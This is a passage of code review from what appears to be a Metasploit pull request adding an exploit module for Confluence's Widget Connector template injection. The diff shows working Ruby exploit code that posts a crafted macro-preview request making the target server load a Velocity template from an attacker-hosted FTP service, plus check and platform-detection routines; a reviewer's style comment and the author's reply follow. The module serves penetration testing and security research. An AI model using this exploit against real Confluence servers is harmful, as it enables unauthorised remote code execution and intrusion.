modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,456 @@
+      EOF
+    )
+  end
+
+  # Returns dummy template.
+  #
+  # @return [String]
+  def get_dummy_vm()
+    (
+      <<~EOF
+      EOF
+    )
+  end
+
+  # Checks the vulnerability.
+  #
+  # @return [Array] Check code
+  def check
+    checkcode = Exploit::CheckCode::Safe
+    begin
+      # Start the FTP service
+      print_status("Starting the FTP server.")
+      start_service
+
+      @check_text = Rex::Text.rand_text_alpha(5)
+      res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+      if res && res.body && res.body.include?(@check_text)
+        checkcode = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      checkcode = Exploit::CheckCode::Unknown
+    end
+    checkcode
+  end
+
+  # Injects Java code to the template.
+  #
+  # @param service_url [String] Address of template to injection.
+  # @return [void]
+  def inject_template(service_url)
+
+    uri  = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'headers' => {
+        'Accept' => '*/*',
+        'Origin' => full_uri(vhost_uri: true)
+      },
+      'ctype'  => 'application/json; charset=UTF-8',
+      'data'   => {
+                    'contentId' => '1',
+                    'macro' => {
+                      'name' => 'widget',
+                      'body' => '',
+                      'params' => {
+                        'url' => datastore['TRIGGERURL'],
+                        '_template' => service_url
+                      }
+
+                    }
+                  }.to_json
+    })
+
+    if !res
+      elog('Connection timed out in #inject_template')
+    elsif res && /widget-error/ === res.body
+      print_error('Failed to inject and execute code:')
+      vprint_line(res.body)
+    elsif res
+      vprint_status("Server response:")
+      vprint_line res.body
+    end
+
+    res
+  end
+
+  # Returns a system property for Java.
+  #
+  # @param prop [String] Name of the property to retrieve.
+  # @return [String]
+  def get_java_property(prop)
+    @prop = prop
+    res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+    if res && res.body
+      return clear_response(res.body)
+    end
+    ''
+  end
+
+  # Returns the target platform.
+  #
+  # @return [String]
+  def get_target_platform()
+    return get_java_property('os.name')
+  end
+
+  # Checks if the target os/platform is compatible with the module target or not.
+  #
+  # @return [TrueClass] Compatible
+  # @return [FalseClass] Not compatible
+  def target_platform_compat?(target_platform)
+    target.platform.names.each do |n|
+      if /^java$/i === n || /#{n}/i === target_platform
```

Comment:
Regex seems a little unnecessary for case insensitive string comparison.

Suggest:

```suggestion
      if n.downcase == 'java' || n.downcase == target_platform.downcase
```

Reply:
Replaced with your suggestion. Thank you.